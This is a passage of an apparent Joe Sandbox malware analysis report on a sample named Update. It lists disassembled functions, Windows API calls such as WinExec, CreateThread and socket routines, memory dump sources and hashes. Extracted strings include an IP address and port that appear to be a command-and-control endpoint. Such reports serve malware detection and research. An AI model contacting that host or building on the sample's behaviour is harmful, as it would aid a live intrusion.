                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                            • String ID:
                                                                                            • API String ID: 155776804-0
                                                                                            • Opcode ID: e65de1f8ea2eb8b76d6d9d64e0494a4bcd1a768c94170aba122514c247a651ba
                                                                                            • Instruction ID: 4564c24f87a8b28840f1a346fe4bddb7a217980cccfe2726ed799eb29f5b8c21
                                                                                            • Opcode Fuzzy Hash: e65de1f8ea2eb8b76d6d9d64e0494a4bcd1a768c94170aba122514c247a651ba
                                                                                            • Instruction Fuzzy Hash: 7611C23A200706AFDB10FFA6EC44D9B7799DF44765B1A442FFA148E250EB71D4068A68
                                                                                            Function 1000721B Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___set_flsgetvalue.LIBCMT ref: 10007240
                                                                                            • __calloc_crt.LIBCMT ref: 1000724C
                                                                                            • __getptd.LIBCMT ref: 10007259
                                                                                            • CreateThread.KERNEL32(?,?,100071B6,00000000,?,?), ref: 10007290
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 1000729A
                                                                                            • _free.LIBCMT ref: 100072A3
                                                                                            • __dosmaperr.LIBCMT ref: 100072AE
                                                                                              • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                            • String ID:
                                                                                            • API String ID: 155776804-0
                                                                                            • Opcode ID: d853c5aad6a4ca1283704040be1a2fdba58bd4e9b88c6b00cf5b9d9771d5e89a
                                                                                            • Instruction ID: e2e0b3d062d787f99d787063b624e9a47e01a5ceed69b34c49d3f3bc16e6f751
                                                                                            • Opcode Fuzzy Hash: d853c5aad6a4ca1283704040be1a2fdba58bd4e9b88c6b00cf5b9d9771d5e89a
                                                                                            • Instruction Fuzzy Hash: C911E136604746AFF711DFA8DC41D8B37E8FF453E0B110029F95C8A19ADB79E8008AA0
                                                                                            Function 034EF9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___set_flsgetvalue.LIBCMT ref: 034EF9CA
                                                                                              • Part of subcall function 034F3CA0: TlsGetValue.KERNEL32(00000000,034F3DF9,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000), ref: 034F3CA9
                                                                                              • Part of subcall function 034F3CA0: DecodePointer.KERNEL32(?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000,?,034F3F06,0000000D), ref: 034F3CBB
                                                                                              • Part of subcall function 034F3CA0: TlsSetValue.KERNEL32(00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000,00000000,?,034F3F06), ref: 034F3CCA
                                                                                            • ___fls_getvalue@4.LIBCMT ref: 034EF9D5
                                                                                              • Part of subcall function 034F3C80: TlsGetValue.KERNEL32(?,?,034EF9DA,00000000), ref: 034F3C8E
                                                                                            • ___fls_setvalue@8.LIBCMT ref: 034EF9E8
                                                                                              • Part of subcall function 034F3CD4: DecodePointer.KERNEL32(?,?,?,034EF9ED,00000000,?,00000000), ref: 034F3CE5
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 034EF9F1
                                                                                            • ExitThread.KERNEL32 ref: 034EF9F8
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034EF9FE
                                                                                            • __freefls@4.LIBCMT ref: 034EFA1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                            • String ID:
                                                                                            • API String ID: 2383549826-0
                                                                                            • Opcode ID: 627f58527ec2183a1fbb0a48785122d7aa00c6ee358d16418d7177a7edad6a30
                                                                                            • Instruction ID: 96782b40e10ad199894be4f36e5e7be83c580b6f5ef346c17244db5539f0cced
                                                                                            • Opcode Fuzzy Hash: 627f58527ec2183a1fbb0a48785122d7aa00c6ee358d16418d7177a7edad6a30
                                                                                            • Instruction Fuzzy Hash: 0DF0627D601381BFC708FFB2C508C0E7BA8AF4434971A845EEA058F211DA35D446CB99
                                                                                            Function 100071B6 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___set_flsgetvalue.LIBCMT ref: 100071BC
                                                                                              • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
                                                                                              • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
                                                                                              • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
                                                                                            • ___fls_getvalue@4.LIBCMT ref: 100071C7
                                                                                              • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
                                                                                            • ___fls_setvalue@8.LIBCMT ref: 100071DA
                                                                                              • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
                                                                                            • ExitThread.KERNEL32 ref: 100071EA
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100071F0
                                                                                            • __freefls@4.LIBCMT ref: 10007210
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                            • String ID:
                                                                                            • API String ID: 2383549826-0
                                                                                            • Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                                            • Instruction ID: 9ef8d05c11a244158b1ee883055881acaa61a2209176cdde4bb0df2a080a06ba
                                                                                            • Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                                            • Instruction Fuzzy Hash: 7EF09679404240ABF304DFB5C94988E7BA9FF482C4725C458F90C8B21BDB39E8428790
                                                                                            Function 6C382F01 Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 778COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $,$jIk
                                                                                            • API String ID: 0-2946808363
                                                                                            • Opcode ID: f30313e96864c2d1e94fbfa72b8526d76e0a49a6a7521aa82f5d3e7793817e7a
                                                                                            • Instruction ID: 8a6268a5188a22f4a63f9e9ad134450d9366f3a52822c88ce9dd0f6ea02229c4
                                                                                            • Opcode Fuzzy Hash: f30313e96864c2d1e94fbfa72b8526d76e0a49a6a7521aa82f5d3e7793817e7a
                                                                                            • Instruction Fuzzy Hash: 0572CC71D122688BEB24CF28C8947EDBBB2AF85304F158298D4497B781DB755EC8CF81
                                                                                            Function 6C383024 Relevance: 9.5, APIs: 2, Strings: 3, Instructions: 738COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $,$jIk
                                                                                            • API String ID: 0-2946808363
                                                                                            • Opcode ID: c42403a26485c7196f2e3b510e15ed05cbdef0fb0e35b4b31b75b3189f048342
                                                                                            • Instruction ID: cda752c6e28f78cf0f2a7578ad9c588b0dae74c7e01a2b5b2873cdbc78f917e0
                                                                                            • Opcode Fuzzy Hash: c42403a26485c7196f2e3b510e15ed05cbdef0fb0e35b4b31b75b3189f048342
                                                                                            • Instruction Fuzzy Hash: E572CC71D162688BEB24CF24C8947EDBBB2AF85304F158298D4497BB81DB755EC8CF81
                                                                                            Function 6C3A21F6 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e55b7b6643599ba769ce6972dbdd5fdbc3f02e45245a4038d3d08a8380b308a2
                                                                                            • Instruction ID: 6c4a82f22ab10ea6bf6122abd527e6d64b8265216398259e3477cdda11811f3a
                                                                                            • Opcode Fuzzy Hash: e55b7b6643599ba769ce6972dbdd5fdbc3f02e45245a4038d3d08a8380b308a2
                                                                                            • Instruction Fuzzy Hash: E7B135B0A04249AFDB05CFDACA48BADBBB4FF46308F544148E4599B781C7339956CF61
                                                                                            Function 100032E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100032F1
                                                                                            • Sleep.KERNEL32(00000258), ref: 100032FE
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10003306
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003312
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000331A
                                                                                            • Sleep.KERNEL32(0000012C), ref: 1000332B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 3137405945-0
                                                                                            • Opcode ID: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                                                                            • Instruction ID: f89297930b1253133b9af3f62c08b225611c8876bcc0692efb07df5bac526d50
                                                                                            • Opcode Fuzzy Hash: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                                                                            • Instruction Fuzzy Hash: 65F08971104314AFD610DBE9CCC4D46F3B8AF89331B144709F221872D0CAB1E8018BA0
                                                                                            Function 034E6690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000), ref: 034E669B
                                                                                            • CoCreateInstance.OLE32(035046FC,00000000,00000001,0350471C,?,?,?,?,?,?,?,?,?,?,034E588A), ref: 034E66B2
                                                                                            • SysFreeString.OLEAUT32(?), ref: 034E674C
                                                                                            • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,034E588A), ref: 034E677D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                                            • String ID: FriendlyName
                                                                                            • API String ID: 841178590-3623505368
                                                                                            • Opcode ID: 18431779e12ffee1cfb180c10c7c21e35ef6be2371390623c196f0256763065a
                                                                                            • Instruction ID: 93f280a6befd9660b18438d85d1cb98b3b264b9b3b35566c3966cf396d63b997
                                                                                            • Opcode Fuzzy Hash: 18431779e12ffee1cfb180c10c7c21e35ef6be2371390623c196f0256763065a
                                                                                            • Instruction Fuzzy Hash: F1316D75700209AFDB00DB99DC80EAEB3B9EF88704F148589E504EB3A0D771E902DB60
                                                                                            Function 034EF707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 034EF721
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            • std::exception::exception.LIBCMT ref: 034EF756
                                                                                            • std::exception::exception.LIBCMT ref: 034EF770
                                                                                            • __CxxThrowException@8.LIBCMT ref: 034EF781
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 615853336-2104205924
                                                                                            • Opcode ID: 24ab18e8b19f2ca6bdece779ee823c9b69a2a863230c4ab8f337517af7a8e52c
                                                                                            • Instruction ID: 8b8d18ed102eaa682e31b046c6dc279e15e62ec73dc4c9951b5455d1bc432dc0
                                                                                            • Opcode Fuzzy Hash: 24ab18e8b19f2ca6bdece779ee823c9b69a2a863230c4ab8f337517af7a8e52c
                                                                                            • Instruction Fuzzy Hash: 95F0F9755003096FCB10FB95EC25A5E7BA8AB00245F15405FD410EE1F1DB72CA0D9F9C
                                                                                            Function 00021C50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCommandLineW.KERNEL32(00000001), ref: 00021C61
                                                                                            • CommandLineToArgvW.SHELL32(00000000), ref: 00021C68
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00020000), ref: 00021CD3
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00021CF3
                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00020000,00000000,00000000,00000000,00022778,00000014), ref: 00021D25
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharCommandLineMultiWide$ArgvFreeLocal
                                                                                            • String ID:
                                                                                            • API String ID: 4060259846-0
                                                                                            • Opcode ID: a0286ab1ddf62902ccc1785eaf32c0fcf33a46d095cc89beeae2652f73cfa1c5
                                                                                            • Instruction ID: 3d0a577c08509f4658f2b430a077fa571f5c16f0c350a2ccb7658f16d7ca1b2c
                                                                                            • Opcode Fuzzy Hash: a0286ab1ddf62902ccc1785eaf32c0fcf33a46d095cc89beeae2652f73cfa1c5
                                                                                            • Instruction Fuzzy Hash: 0131F370604315ABE720EF68AC85B9B77E8EF94710F20092CF959D72C1D734ED088B62
                                                                                            Function 6C38D04E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                            • String ID:
                                                                                            • API String ID: 3136044242-0
                                                                                            • Opcode ID: ec660802f505d79b66ad04a2c1451b5f64a7fb4d0d61128bc4e0a2458d93d3c4
                                                                                            • Instruction ID: 6083aa081278cbbaa7e44a9ab894ecd28ef80fcf4f88cd70351ba4089d36c147
                                                                                            • Opcode Fuzzy Hash: ec660802f505d79b66ad04a2c1451b5f64a7fb4d0d61128bc4e0a2458d93d3c4
                                                                                            • Instruction Fuzzy Hash: 6B2183B1D07216ABDB219E56DC40EEF3A7ADF81A98F11421AF8545BB10C7328D028FE1
                                                                                            Function 10002D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10002D3C
                                                                                            • CancelIo.KERNEL32(?), ref: 10002D46
                                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 10002D4F
                                                                                            • closesocket.WS2_32(?), ref: 10002D59
                                                                                            • SetEvent.KERNEL32(00000001), ref: 10002D63
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 1486965892-0
                                                                                            • Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                                            • Instruction ID: c3dd280d0a222891198d8956340d5cd90ea8efbda93af296f9b36197db09124c
                                                                                            • Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                                            • Instruction Fuzzy Hash: 95F04F75100710EFE320DF94CC89F5677B8FB49B12F148659F6829B690C7B1F9048BA0
                                                                                            Function 6C38403B Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 181processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WinExec.KERNEL32(00000000,00000000), ref: 6C38416E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exec
                                                                                            • String ID: &$'$j)wh
                                                                                            • API String ID: 459137531-3604346523
                                                                                            • Opcode ID: 14a7fed1073a974f124c841827d6b5b31bdd49d660d84e676eaa0cd2b9812ae5
                                                                                            • Instruction ID: 472d665a10981cd5108108ead8f68073784a2d1909221f8597e894e8c7151f7d
                                                                                            • Opcode Fuzzy Hash: 14a7fed1073a974f124c841827d6b5b31bdd49d660d84e676eaa0cd2b9812ae5
                                                                                            • Instruction Fuzzy Hash: 46710471C05258CBDB14DFA4C8583EEBBB2BF41308F15465CD0556BB81DBB956C88FA2
                                                                                            Function 6C386410 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: (K[$134.122.155.39$18852
                                                                                            • API String ID: 4218353326-3990176184
                                                                                            • Opcode ID: a61d72dfcd8eb1ca84d7b90833e5b8a8cec6ab8dd13ca4cc2502d6d744eae7bd
                                                                                            • Instruction ID: 7b5c100c51f1c57ea368796cd16c1a80ca80b65ea98ca9c63a82ab7b977c5f4f
                                                                                            • Opcode Fuzzy Hash: a61d72dfcd8eb1ca84d7b90833e5b8a8cec6ab8dd13ca4cc2502d6d744eae7bd
                                                                                            • Instruction Fuzzy Hash: BD412BB15122005FD734EF24E844B9A7BF9FF55308F55062CE049CBB81E739D6488BA2
                                                                                            Function 10006F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 10006F31
                                                                                              • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                                              • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                                              • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                                            • std::exception::exception.LIBCMT ref: 10006F66
                                                                                            • std::exception::exception.LIBCMT ref: 10006F80
                                                                                            • __CxxThrowException@8.LIBCMT ref: 10006F91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                            • String ID:
